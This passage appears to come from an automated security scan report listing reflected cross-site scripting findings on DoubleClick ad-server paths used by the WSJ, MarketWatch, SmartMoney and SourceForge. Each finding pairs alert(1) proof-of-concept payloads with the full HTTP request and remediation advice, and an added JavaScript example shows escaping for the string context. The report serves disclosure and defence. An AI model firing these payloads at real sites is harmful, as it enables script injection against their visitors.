HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 06 Nov 2010 16:02:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 645
The value of the columns request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4c3a'%3balert(1)//428bf2bea99 was submitted in the columns parameter. This input was echoed as e4c3a';alert(1)//428bf2bea99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/brokerbutton.smartmoney.com/watchlist;columns=e4c3a'%3balert(1)//428bf2bea99 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 372
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 06 Nov 2010 16:04:05 GMT
Expires: Sat, 06 Nov 2010 16:04:05 GMT
1.56. http://ad.doubleclick.net/adj/brokerbutton.smartmoney.com/watchlist [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adj/brokerbutton.smartmoney.com/watchlist
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c24b0'-alert(1)-'36ef8a57f3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/brokerbutton.smartmoney.com/watchlist;columns=;contentid=0;pos=6;pagetemplate=0;level2=homepage;tile=6;sz=120x30;ord=1157423771?&c24b0'-alert(1)-'36ef8a57f3c=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 06 Nov 2010 16:04:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 444
The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 281fb'-alert(1)-'3e94587aff7 was submitted in the !category parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.58. http://ad.doubleclick.net/adj/interactive.wsj.com/front_nonsub [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adj/interactive.wsj.com/front_nonsub
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2b7d'-alert(1)-'197373e1ddd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/interactive.wsj.com/front_nonsub?b2b7d'-alert(1)-'197373e1ddd=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 352
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 06 Nov 2010 16:11:41 GMT
Expires: Sat, 06 Nov 2010 16:11:41 GMT
Connection: close
1.59. http://ad.doubleclick.net/adj/interactive.wsj.com/leadership [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adj/interactive.wsj.com/leadership
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8555d'-alert(1)-'e449acf0ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/interactive.wsj.com/leadership?8555d'-alert(1)-'e449acf0ff=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 351
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 06:33:18 GMT
Expires: Sun, 07 Nov 2010 06:33:18 GMT
Connection: close
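The following is an added example, not code from this report or from the DoubleClick ad server. It models the single-quoted JavaScript string context that finding 1.59 above and the pg-parameter finding on /adj/ostg.sourceforge/cons_pg_dwnld_mobile_p77_immersion further down describe, shows why both payload shapes (a'-alert(1)-'b and a';alert(1)//b) run without a syntax error, and contrasts a template that escapes for the JavaScript string context, which is the fallback when the remediation advice (do not echo user data into script at all) cannot be followed. The template `buildAdScript`, the variable name `pg` and the `reflectedValue` decoding step are assumptions standing in for server-side code the report does not show; the two payloads are taken verbatim from the requests in this section.

```javascript
// Added example, not code from the report or from DoubleClick: it models the
// single-quoted JavaScript string context described in the findings, shows
// why the two payload shapes ('-alert(1)-' and ';alert(1)//) execute without a
// syntax error, and contrasts a template that escapes for that context.

// Hypothetical stand-in for the ad-server template (the real one is not in
// the report): the request parameter is echoed into var pg = '...';
function buildAdScript(reflected, escapeFn) {
  const v = escapeFn ? escapeFn(reflected) : reflected; // unescaped => vulnerable
  return "var pg = '" + v + "';\n" +
         "var sz = '300x250';";                          // the next statement
}

// Models the server URL-decoding the parameter before echoing it, which is
// why %3b in the request shows up as ';' in the response.
function reflectedValue(rawParam) {
  return decodeURIComponent(rawParam);
}

// Escapes a value for use inside a JS string literal: everything outside a
// small safe set (so quotes, backslash, parens, '<', '/', ';' and line
// terminators including U+2028/U+2029) is emitted as a \xHH or \uHHHH
// escape, so it can close neither the literal nor the surrounding <script>.
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 _.,-]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Runs a generated script with a stubbed alert(), reporting how many times
// alert fired, the value pg ended up holding, and any parse/runtime error.
function runAdScript(src) {
  const calls = [];
  const alert = (x) => { calls.push(x); };
  let pg, error = null;
  try {
    pg = new Function('alert', src + '\nreturn pg;')(alert);
  } catch (e) {
    error = e.name;
  }
  return { alerts: calls.length, pg, error };
}

// Payloads copied from the requests in this section, as they appear in the
// request line (the second one still percent-encoded).
const PAYLOADS = {
  paramName: "8555d'-alert(1)-'e449acf0ff",
  pgValue:   "fce2f'%3balert(1)//4d21735db26",
};

// For each payload: what the server echoes, what happens with the unescaped
// template, and what happens once the value is escaped for the JS string.
function assessPayloads() {
  const out = {};
  for (const [name, raw] of Object.entries(PAYLOADS)) {
    const value = reflectedValue(raw);
    out[name] = {
      echoedAs:   value,
      vulnerable: runAdScript(buildAdScript(value)),
      hardened:   runAdScript(buildAdScript(value, escapeJsString)),
    };
  }
  return out;
}

console.log(JSON.stringify(assessPayloads(), null, 2));
```

In the unescaped template the first payload turns the statement into `'8555d' - alert(1) - 'e449acf0ff'`, a valid subtraction expression that calls alert and leaves pg as NaN; the second closes the string, starts a new statement, and comments out the rest of the line, so the following statements still parse. With `escapeJsString` both payloads survive as inert string contents. Two caveats a practitioner should keep in mind: the escaping is correct only for the string-literal context, so if pg is later written into HTML (for example via document.write) it needs HTML encoding at that point as well; and because these responses are served as application/x-javascript, the injected code runs when the URL is loaded as a script source (for example through a `<script src>` tag on a publisher page that forwards its own parameters), not when a victim navigates to the ad URL directly.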
1.60. http://ad.doubleclick.net/adj/interactive.wsj.com/leadership_style [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/interactive.wsj.com/leadership_style
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6da30'-alert(1)-'0ecc1ed66b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/interactive.wsj.com/leadership_style?6da30'-alert(1)-'0ecc1ed66b4=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 352
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 06:33:22 GMT
Expires: Sun, 07 Nov 2010 06:33:22 GMT
Connection: close
1.61. http://ad.doubleclick.net/adj/interactive.wsj.com/markets_front [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/interactive.wsj.com/markets_front
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d928'-alert(1)-'36a092fd59c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/interactive.wsj.com/markets_front?3d928'-alert(1)-'36a092fd59c=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 352
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 06 Nov 2010 16:11:42 GMT
Expires: Sat, 06 Nov 2010 16:11:42 GMT
Connection: close
1.62. http://ad.doubleclick.net/adj/marketwatch.com/frontpage [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/marketwatch.com/frontpage
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd164'-alert(1)-'457a3895181 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/marketwatch.com/frontpage;s=8_10001;u=%5e%5elA;sz=300x250,336x280;tile=6;ord=1242115728?&dd164'-alert(1)-'457a3895181=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 07 Nov 2010 09:29:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 422
1.63. http://ad.doubleclick.net/adj/ostg.sourceforge/cons_pg_dwnld_mobile_p77_immersion [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95522'-alert(1)-'68c40687c6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.sourceforge/cons_pg_dwnld_mobile_p77_immersion?95522'-alert(1)-'68c40687c6b=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 311
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 06:34:29 GMT
Expires: Sun, 07 Nov 2010 06:34:29 GMT
Connection: close
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fce2f'%3balert(1)//4d21735db26 was submitted in the pg parameter. This input was echoed as fce2f';alert(1)//4d21735db26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.sourceforge/cons_pg_dwnld_mobile_p77_immersion;pg=fce2f'%3balert(1)//4d21735db26 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/projects/filezilla/files/FileZilla_Client/3.3.4.1/FileZilla_3.3.4.1_win32-setup.exe/download
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 312
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 06 Nov 2010 16:36:48 GMT
Expires: Sat, 06 Nov 2010 16:36:48 GMT
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86576'-alert(1)-'ba08ff4fb80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.sourceforge/cons_pg_dwnld_mobile_p97_wrapper?86576'-alert(1)-'ba08ff4fb80=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 311
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 06:34:29 GMT
Expires: Sun, 07 Nov 2010 06:34:29 GMT
Connection: close
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83ca9'%3balert(1)//8fc0e683942 was submitted in the pg parameter. This input was echoed as 83ca9';alert(1)//8fc0e683942 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.sourceforge/cons_pg_dwnld_mobile_p97_wrapper;pg=83ca9'%3balert(1)//8fc0e683942 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/projects/filezilla/files/FileZilla_Client/3.3.4.1/FileZilla_3.3.4.1_win32-setup.exe/download
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 312
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 06 Nov 2010 16:36:40 GMT
Expires: Sat, 06 Nov 2010 16:36:40 GMT
The value of the columns request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52b73'%3balert(1)//695156bcc6c was submitted in the columns parameter. This input was echoed as 52b73';alert(1)//695156bcc6c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/smartmoney.com/frontpage;columns=52b73'%3balert(1)//695156bcc6c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 432
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 06 Nov 2010 16:01:55 GMT
Expires: Sat, 06 Nov 2010 16:01:55 GMT
1.68. http://ad.doubleclick.net/adj/smartmoney.com/frontpage [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/smartmoney.com/frontpage
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 908aa'-alert(1)-'08d5484cd5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/smartmoney.com/frontpage?908aa'-alert(1)-'08d5484cd5f=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 427
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 06 Nov 2010 16:11:47 GMT
Expires: Sat, 06 Nov 2010 16:11:47 GMT
Connection: close